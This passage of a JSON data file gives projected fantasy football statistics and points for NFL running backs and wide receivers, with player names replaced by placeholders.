"Team": "GB",
"ATT": 106.9,
"YDS": 414.9,
"TDS": 2.7,
"REC": 22.6,
"YDS_1": 177.1,
"TDS_1": 0.6,
"FL": 0.6,
"FPTS": 100.6
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 112.5,
"YDS": 484.5,
"TDS": 2.9,
"REC": 18.5,
"YDS_1": 136,
"TDS_1": 0.6,
"FL": 2.6,
"FPTS": 96
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 122.2,
"YDS": 435.7,
"TDS": 3.3,
"REC": 17.9,
"YDS_1": 125.6,
"TDS_1": 0.4,
"FL": 0.8,
"FPTS": 95
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 83.9,
"YDS": 356,
"TDS": 2.9,
"REC": 18.5,
"YDS_1": 172.7,
"TDS_1": 1.1,
"FL": 0.5,
"FPTS": 94.2
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 131.3,
"YDS": 441.9,
"TDS": 3.2,
"REC": 13.3,
"YDS_1": 85.9,
"TDS_1": 0.2,
"FL": 1,
"FPTS": 84.1
},
{
"Player": "<NAME>",
"Team": "BUF",
"ATT": 60,
"YDS": 239,
"TDS": 1.2,
"REC": 25.3,
"YDS_1": 222.5,
"TDS_1": 1.1,
"FL": 0.6,
"FPTS": 83.6
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 110.5,
"YDS": 427.4,
"TDS": 2.9,
"REC": 12.3,
"YDS_1": 95.8,
"TDS_1": 0.3,
"FL": 0.9,
"FPTS": 81.9
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 99.6,
"YDS": 367.6,
"TDS": 3,
"REC": 13.7,
"YDS_1": 116.9,
"TDS_1": 0.5,
"FL": 1,
"FPTS": 81.5
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 78.8,
"YDS": 322.1,
"TDS": 2.3,
"REC": 17.5,
"YDS_1": 134.8,
"TDS_1": 0.6,
"FL": 0.9,
"FPTS": 79.2
},
{
"Player": "<NAME>",
"Team": "LAC",
"ATT": 84,
"YDS": 332.5,
"TDS": 2.2,
"REC": 15.5,
"YDS_1": 124.6,
"TDS_1": 0.4,
"FL": 0.2,
"FPTS": 76.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 70.3,
"YDS": 244.8,
"TDS": 1.8,
"REC": 19.8,
"YDS_1": 159.2,
"TDS_1": 0.7,
"FL": 0.8,
"FPTS": 73.5
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 79.3,
"YDS": 307.7,
"TDS": 2.2,
"REC": 15.2,
"YDS_1": 113.6,
"TDS_1": 0.5,
"FL": 0.9,
"FPTS": 71.7
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 68.8,
"YDS": 267.6,
"TDS": 1.7,
"REC": 17,
"YDS_1": 133.8,
"TDS_1": 0.5,
"FL": 0.4,
"FPTS": 69.4
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 61.7,
"YDS": 270.9,
"TDS": 2.2,
"REC": 15.6,
"YDS_1": 111.2,
"TDS_1": 0.4,
"FL": 0.5,
"FPTS": 68.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 94.3,
"YDS": 454.5,
"TDS": 2.9,
"REC": 2.6,
"YDS_1": 20,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 66.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 54.5,
"YDS": 252,
"TDS": 1.7,
"REC": 15,
"YDS_1": 130,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 66.1
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 35.7,
"YDS": 160.5,
"TDS": 1.1,
"REC": 23.1,
"YDS_1": 186.1,
"TDS_1": 0.5,
"FL": 1,
"FPTS": 65.7
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 31.5,
"YDS": 136.9,
"TDS": 0.6,
"REC": 26.4,
"YDS_1": 183.9,
"TDS_1": 0.5,
"FL": 0.7,
"FPTS": 63.9
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 51.5,
"YDS": 227.5,
"TDS": 1.2,
"REC": 17.2,
"YDS_1": 159,
"TDS_1": 0.6,
"FL": 1.4,
"FPTS": 63.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 52.8,
"YDS": 222.5,
"TDS": 1.5,
"REC": 13.3,
"YDS_1": 103.1,
"TDS_1": 0.2,
"FL": 0.4,
"FPTS": 55.6
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 8,
"YDS": 28.2,
"TDS": 0.4,
"REC": 23.8,
"YDS_1": 219.6,
"TDS_1": 0.9,
"FL": 0.9,
"FPTS": 54.9
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 40.6,
"YDS": 178.6,
"TDS": 1.4,
"REC": 14.6,
"YDS_1": 114.4,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 54.4
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 46.8,
"YDS": 157.3,
"TDS": 1,
"REC": 16.7,
"YDS_1": 129.8,
"TDS_1": 0.5,
"FL": 0.3,
"FPTS": 53.5
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 52.4,
"YDS": 201.5,
"TDS": 1.1,
"REC": 14,
"YDS_1": 101.9,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 52.4
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 58.2,
"YDS": 216,
"TDS": 1.5,
"REC": 11.2,
"YDS_1": 78.5,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 51.1
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 54,
"YDS": 215.2,
"TDS": 1.3,
"REC": 11.7,
"YDS_1": 84.2,
"TDS_1": 0.2,
"FL": 0.8,
"FPTS": 48.9
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 50.1,
"YDS": 197.9,
"TDS": 1.3,
"REC": 10.2,
"YDS_1": 76.9,
"TDS_1": 0.6,
"FL": 0.3,
"FPTS": 48.3
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 36.3,
"YDS": 186.8,
"TDS": 1.2,
"REC": 10.6,
"YDS_1": 88.8,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 47.4
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 44.7,
"YDS": 139,
"TDS": 1.4,
"REC": 11.6,
"YDS_1": 99.7,
"TDS_1": 0.6,
"FL": 0.4,
"FPTS": 46.6
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 35.9,
"YDS": 120,
"TDS": 0.6,
"REC": 15.4,
"YDS_1": 123.3,
"TDS_1": 0.6,
"FL": 0.2,
"FPTS": 46.2
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 49.1,
"YDS": 200.6,
"TDS": 1.5,
"REC": 7.5,
"YDS_1": 50.7,
"TDS_1": 0.2,
"FL": 0.3,
"FPTS": 41.7
},
{
"Player": "<NAME>.",
"Team": "PIT",
"ATT": 42,
"YDS": 163.3,
"TDS": 1.3,
"REC": 9.1,
"YDS_1": 78.8,
"TDS_1": 0.4,
"FL": 0.9,
"FPTS": 41.5
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 25.6,
"YDS": 89.1,
"TDS": 0.3,
"REC": 15.6,
"YDS_1": 129.4,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 41.4
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 40.4,
"YDS": 168.4,
"TDS": 1.2,
"REC": 8.3,
"YDS_1": 73.9,
"TDS_1": 0.3,
"FL": 0.7,
"FPTS": 40.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 15.7,
"YDS": 69,
"TDS": 0.3,
"REC": 14.4,
"YDS_1": 119.3,
"TDS_1": 0.7,
"FL": 0.1,
"FPTS": 39.2
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 37.6,
"YDS": 187.9,
"TDS": 1.3,
"REC": 7.2,
"YDS_1": 52.5,
"TDS_1": 0.2,
"FL": 0.5,
"FPTS": 39.2
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 42.7,
"YDS": 186,
"TDS": 1.2,
"REC": 7.5,
"YDS_1": 60.9,
"TDS_1": 0.2,
"FL": 1,
"FPTS": 38.7
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 51.9,
"YDS": 180.6,
"TDS": 1.1,
"REC": 7.4,
"YDS_1": 59.7,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 38.5
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 27.6,
"YDS": 169.6,
"TDS": 0.8,
"REC": 8.4,
"YDS_1": 67.2,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 37.5
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 32.3,
"YDS": 132.9,
"TDS": 1,
"REC": 8.4,
"YDS_1": 60.5,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 34.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 14.7,
"YDS": 59,
"TDS": 0.3,
"REC": 12,
"YDS_1": 100.5,
"TDS_1": 0.5,
"FL": 0.1,
"FPTS": 32.3
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 29,
"YDS": 128.2,
"TDS": 0.9,
"REC": 7.6,
"YDS_1": 57.3,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 32
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 40,
"YDS": 182.6,
"TDS": 1,
"REC": 4.4,
"YDS_1": 28.8,
"TDS_1": 0.1,
"FL": 1.3,
"FPTS": 29.7
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 22.6,
"YDS": 143.6,
"TDS": 0.8,
"REC": 5.2,
"YDS_1": 38.3,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 28
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 31.2,
"YDS": 145,
"TDS": 1,
"REC": 3.6,
"YDS_1": 33.1,
"TDS_1": 0.2,
"FL": 0.4,
"FPTS": 27.9
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 25.6,
"YDS": 88.9,
"TDS": 0.4,
"REC": 8,
"YDS_1": 67.1,
"TDS_1": 0.3,
"FL": 0.1,
"FPTS": 27.5
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 21.2,
"YDS": 82.9,
"TDS": 0.4,
"REC": 7.8,
"YDS_1": 56.5,
"TDS_1": 0.6,
"FL": 0.4,
"FPTS": 27.3
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 33,
"YDS": 130.8,
"TDS": 0.9,
"REC": 4.3,
"YDS_1": 34.4,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 27.2
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 0,
"YDS": 89.1,
"TDS": 0.6,
"REC": 6.4,
"YDS_1": 52,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 25.1
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 15.8,
"YDS": 83.5,
"TDS": 0.6,
"REC": 6.7,
"YDS_1": 52,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 24.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 6.3,
"YDS": 72.1,
"TDS": 0.6,
"REC": 6.9,
"YDS_1": 54.3,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 24.1
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 25.2,
"YDS": 107.4,
"TDS": 0.8,
"REC": 3.7,
"YDS_1": 27,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 21.9
},
{
"Player": "<NAME>",
"Team": "MIA",
"ATT": 27.2,
"YDS": 108.3,
"TDS": 0.4,
"REC": 4.3,
"YDS_1": 35.4,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 21.4
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 17.8,
"YDS": 77.4,
"TDS": 0.5,
"REC": 4.2,
"YDS_1": 46.2,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 20.6
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 5.9,
"YDS": 22.2,
"TDS": 0.9,
"REC": 6.9,
"YDS_1": 47.8,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 20.5
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 7.2,
"YDS": 20.5,
"TDS": 0.2,
"REC": 6.8,
"YDS_1": 67.8,
"TDS_1": 0.6,
"FL": 0.1,
"FPTS": 20.5
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 25.4,
"YDS": 111.9,
"TDS": 0.6,
"REC": 3,
"YDS_1": 20.9,
"TDS_1": 0.1,
"FL": 0,
"FPTS": 20.4
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 15.4,
"YDS": 86.1,
"TDS": 0.4,
"REC": 4.4,
"YDS_1": 33.3,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 19.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 23.4,
"YDS": 85.5,
"TDS": 0.6,
"REC": 3.9,
"YDS_1": 25.5,
"TDS_1": 0.1,
"FL": 0,
"FPTS": 19.4
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 19.8,
"YDS": 90.2,
"TDS": 0.5,
"REC": 3.2,
"YDS_1": 29,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 18.9
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 12.8,
"YDS": 41.3,
"TDS": 0.2,
"REC": 6.5,
"YDS_1": 47.7,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 18.5
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 9.5,
"YDS": 41.4,
"TDS": 0.3,
"REC": 4.9,
"YDS_1": 30.4,
"TDS_1": 0.7,
"FL": 0.1,
"FPTS": 18.2
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 11.6,
"YDS": 57.3,
"TDS": 1.4,
"REC": 1.4,
"YDS_1": 12.3,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 16.8
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 9.1,
"YDS": 38.5,
"TDS": 0.3,
"REC": 4.3,
"YDS_1": 33.9,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 13.5
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 10,
"YDS": 38.2,
"TDS": 0.3,
"REC": 4.4,
"YDS_1": 30.2,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 13.4
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 17.8,
"YDS": 102.6,
"TDS": 0.5,
"REC": 0.5,
"YDS_1": 4.8,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 13.4
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 14,
"YDS": 69.5,
"TDS": 0.8,
"REC": 0.9,
"YDS_1": 7.7,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 12.9
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 105.8,
"YDS": 1525.8,
"TDS": 8.9,
"ATT": 1.5,
"YDS_1": 9.4,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 312
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 102.5,
"YDS": 1438.5,
"TDS": 10.3,
"ATT": 0.2,
"YDS_1": 1.2,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 307.4
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 105.7,
"YDS": 1355.2,
"TDS": 10.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 303.6
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 111.7,
"YDS": 1347.9,
"TDS": 8.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 297
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 103.8,
"YDS": 1360.9,
"TDS": 8.9,
"ATT": 0.2,
"YDS_1": 1.7,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 293.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 81.4,
"YDS": 1274.1,
"TDS": 8.8,
"ATT": 12.6,
"YDS_1": 93,
"TDS_1": 1,
"FL": 0.2,
"FPTS": 276.3
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 84.8,
"YDS": 1366.8,
"TDS": 7.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 268
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 97.7,
"YDS": 1254.2,
"TDS": 6.9,
"ATT": 3,
"YDS_1": 20.3,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 265.8
},
{
"Player": "<NAME>.",
"Team": "CLE",
"REC": 87.2,
"YDS": 1208.8,
"TDS": 9,
"ATT": 2.8,
"YDS_1": 11.6,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 263
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 93.6,
"YDS": 1120.2,
"TDS": 6.3,
"ATT": 7.6,
"YDS_1": 55.9,
"TDS_1": 0.3,
"FL": 0.3,
"FPTS": 249.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 86.4,
"YDS": 1121.5,
"TDS": 6.6,
"ATT": 3.4,
"YDS_1": 20.5,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 239.8
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 81.8,
"YDS": 1105.5,
"TDS": 7.3,
"ATT": 0.9,
"YDS_1": 5.2,
"TDS_1": 0,
"FL": 0.5,
"FPTS": 235.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 88.4,
"YDS": 1003.4,
"TDS": 7.3,
"ATT": 6.1,
"YDS_1": 30.9,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 235.5
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 74,
"YDS": 1114.2,
"TDS": 6.3,
"ATT": 6.6,
"YDS_1": 41.8,
"TDS_1": 0.5,
"FL": 0.2,
"FPTS": 230
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 76.4,
"YDS": 1037.8,
"TDS": 5.5,
"ATT": 10.5,
"YDS_1": 73.7,
"TDS_1": 0.7,
"FL": 0.3,
"FPTS": 223.8
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 67,
"YDS": 1067.8,
"TDS": 7.1,
"ATT": 8.4,
"YDS_1": 53.6,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 221.8
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 72.9,
"YDS": 1129.7,
"TDS": 5.8,
"ATT": 0,
"YDS_1": 0.1,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 220.3
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 73.7,
"YDS": 1059.3,
"TDS": 6.2,
"ATT": 0.9,
"YDS_1": 5.4,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 216.7
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 76.6,
"YDS": 999.2,
"TDS": 5.8,
"ATT": 0.7,
"YDS_1": 3.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 211.2
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 71.9,
"YDS": 986.2,
"TDS": 6.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 207.8
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 69.4,
"YDS": 934.8,
"TDS": 6.7,
"ATT": 3.1,
"YDS_1": 19.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 204.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 66.5,
"YDS": 906.6,
"TDS": 6.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 197.1
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 67,
"YDS": 919.3,
"TDS": 6,
"ATT": 0.4,
"YDS_1": 1.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 195.7
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 60.2,
"YDS": 874.6,
"TDS": 7.3,
"ATT": 3.6,
"YDS_1": 19.2,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 193.5
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 66.5,
"YDS": 887.1,
"TDS": 4.5,
"ATT": 13,
"YDS_1": 110.6,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 193.2
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 61.1,
"YDS": 898.2,
"TDS": 6.5,
"ATT": 3.5,
"YDS_1": 16,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 191.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 63.6,
"YDS": 891.8,
"TDS": 6.2,
"ATT": 2.1,
"YDS_1": 14,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 190.9
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 70.5,
"YDS": 838.8,
"TDS": 5.2,
"ATT": 3.7,
"YDS_1": 25.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 188.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 61.7,
"YDS": 903.6,
"TDS": 5.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 187.2
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 63.7,
"YDS": 802.3,
"TDS": 6.5,
"ATT": 5.3,
"YDS_1": 29.6,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 185.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 64.9,
"YDS": 852.2,
"TDS": 4.8,
"ATT": 2,
"YDS_1": 11.4,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 179.8
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 69.2,
"YDS": 791.5,
"TDS": 4.9,
"ATT": 4.1,
"YDS_1": 25.9,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 179.6
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 63.5,
"YDS": 839.6,
"TDS": 4.9,
"ATT": 2.1,
"YDS_1": 12.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 177.7
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 57.2,
"YDS": 845.4,
"TDS": 6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 177.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 68.2,
"YDS": 759.3,
"TDS": 5.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 174.2
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 58.6,
"YDS": 807.6,
"TDS": 5.7,
"ATT": 0.3,
"YDS_1": 0.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 173.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 53.7,
"YDS": 861.4,
"TDS": 5.6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 172.8
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 61.7,
"YDS": 814.3,
"TDS": 4.4,
"ATT": 3.7,
"YDS_1": 23.3,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 171.3
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 64.3,
"YDS": 782.4,
"TDS": 4.3,
"ATT": 2.4,
"YDS_1": 11.1,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 169.4
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 57.2,
"YDS": 716.6,
"TDS": 4.8,
"ATT": 9.6,
"YDS_1": 71.9,
"TDS_1": 0.5,
"FL": 0.2,
"FPTS": 167.7
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 52.4,
"YDS": 762.6,
"TDS": 5.5,
"ATT": 0.2,
"YDS_1": 1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 161.5
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 59.3,
"YDS": 723.5,
"TDS": 3.7,
"ATT": 3,
"YDS_1": 22.2,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 156.1
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 58.6,
"YDS": 689.3,
"TDS": 4,
"ATT": 1.8,
"YDS_1": 10.8,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 152.3
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 49.4,
"YDS": 710.2,
"TDS": 4.5,
"ATT": 0.2,
"YDS_1": 1.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 147.5
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 53.4,
"YDS": 662.5,
"TDS": 4,
"ATT": 5.4,
"YDS_1": 31.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 147
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 44.4,
"YDS": 735,
"TDS": 4.3,
"ATT": 3.5,
"YDS_1": 25,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 146.9
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 47.5,
"YDS": 708.4,
"TDS": 4.3,
"ATT": 0,
"YDS_1": 0.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 144.1
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 49.1,
"YDS": 677.7,
"TDS": 4.3,
"ATT": 1.8,
"YDS_1": 10.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 143.5
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 50.6,
"YDS": 654,
"TDS": 4.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 142.5
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 50.7,
"YDS": 671.7,
"TDS": 4.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 141.9
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 49.4,
"YDS": 694.1,
"TDS": 3.9,
"ATT": 0.4,
"YDS_1": 1.1,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 141.7
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 54.9,
"YDS": 631.8,
"TDS": 3.3,
"ATT": 1.9,
"YDS_1": 14,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 138.9
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 44.2,
"YDS": 644.4,
"TDS": 3.6,
"ATT": 8,
"YDS_1": 54.3,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 137.3
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 45.7,
"YDS": 652.1,
"TDS": 4.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 137.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 47.3,
"YDS": 675.4,
"TDS": 3.4,
"ATT": 1.9,
"YDS_1": 10.7,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 136.5
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 54,
"YDS": 601.6,
"TDS": 3.5,
"ATT": 0,
"YDS_1": 0.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 134.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 43.4,
"YDS": 651.8,
"TDS": 4.3,
"ATT": 0.2,
"YDS_1": 0.8,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 134.1
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 52.7,
"YDS": 610.6,
"TDS": 3.2,
"ATT": 1.7,
"YDS_1": 9.3,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 134
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 50.1,
"YDS": 634.4,
"TDS": 3.2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 132.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 44.1,
"YDS": 570.2,
"TDS": 3.9,
"ATT": 2.3,
"YDS_1": 11.7,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 125.6
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 53.3,
"YDS": 538.5,
"TDS": 2.7,
"ATT": 0.9,
"YDS_1": 4.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 123.8
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 48.8,
"YDS": 540.6,
"TDS": 3.1,
"ATT": 3.7,
"YDS_1": 18.1,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 123.2
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 41.7,
"YDS": 591.1,
"TDS": 3.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 122.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 48.8,
"YDS": 564.1,
"TDS": 2.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 122.3
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 47,
"YDS": 538.2,
"TDS": 2.6,
"ATT": 4.4,
"YDS_1": 27.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 119
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 47.4,
